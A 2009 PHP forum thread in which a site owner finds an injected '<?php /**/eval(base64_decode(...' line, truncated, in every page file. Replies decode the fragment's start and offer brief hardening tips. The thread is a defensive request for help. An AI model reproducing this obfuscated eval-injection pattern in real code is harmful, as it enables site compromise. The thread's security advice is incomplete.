Go Back   CodingForums.com > :: Server side development > PHP
Reload this Page php decode hacked my site

Before you post, read our: Rules & Posting Guidelines

Reply
 
Thread Tools Rate Thread
Enjoy an ad free experience by logging in. Not a member yet? Register.
Old 10-20-2009, 07:51 AM   PM User | #1
john_zakaria
Regular Coder

 
Join Date: Dec 2008
Posts: 122
Thanks: 0
Thanked 0 Times in 0 Posts
john_zakaria can only hope to improve
php decode hacked my site
i found a problem on my site and when i compare the files on the server with my local files i found that every page (*.js or *.php) has this line on it
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKC
or a javascript line


so i knew that my site has been hacked..
so
1 - i want to know how to prevent anyone to hack my site?
i made on every textfield or textarea on posting or getting it the htmlspecialcharacter($_POST['name'])

is this true? and can it help me?

2- how did anyone hack my site??

3- how i can know what does this code mean???

thanks in advance and have a nice day
john_zakaria is offline   Reply With Quote
Old 10-20-2009, 09:03 AM   PM User | #2
abduraooft
Supreme Master coder!

 
abduraooft's Avatar
 
Join Date: Mar 2007
Location: N/A
Posts: 14,689
Thanks: 158
Thanked 2,184 Times in 2,171 Posts
abduraooft is just really niceabduraooft is just really niceabduraooft is just really niceabduraooft is just really niceabduraooft is just really nice
Are you using any opensource engine anywhere under your ftp account?
__________________
Quote:
The Dream is not what you see in sleep; Dream is the thing which doesn't let you sleep. --(Dr. APJ. Abdul Kalam)
abduraooft is offline   Reply With Quote
Old 10-20-2009, 09:03 AM   PM User | #3
Phil Jackson
Senior Coder

 
Join Date: Aug 2009
Location: Mansfield, Nottinghamshire, UK
Posts: 1,547
Thanks: 57
Thanked 148 Times in 147 Posts
Phil Jackson is on a distinguished road
post the rest of the line "(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKC "
above translates to "if(function_exists("
__________________
Website Design Mansfield
PHP Code:
function I_LOVE(){function b(&$b='P'){$b.='P';}function a($_){return $_++;}$b='P';define("B",'H');b($b=implode('',array($b=a($b),$b=a(B))));b($b);return $b;}
echo I_LOVE(); 
Last edited by Phil Jackson; 10-20-2009 at 04:08 PM..
Phil Jackson is offline   Reply With Quote
Old 10-20-2009, 04:02 PM   PM User | #4
Fumigator
UE Antagonizer


 
Fumigator's Avatar
 
Join Date: Dec 2005
Location: Utah, USA, Northwestern hemisphere, Earth, Solar System, Milky Way Galaxy, Alpha Quadrant
Posts: 7,687
Thanks: 42
Thanked 637 Times in 625 Posts
Fumigator is a glorious beacon of lightFumigator is a glorious beacon of lightFumigator is a glorious beacon of lightFumigator is a glorious beacon of lightFumigator is a glorious beacon of light
Is your password a regular word that can be found in a dictionary? You really must use numbers and characters in your password.
__________________
Fumigator is offline   Reply With Quote
Reply

Bookmarks

Jump To Top of Thread


« Previous Thread | Next Thread »
Thread Tools
Rate This Thread
Rate This Thread:

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump


All times are GMT +1. The time now is 08:22 AM.
Advertisement
Log in to turn off these ads.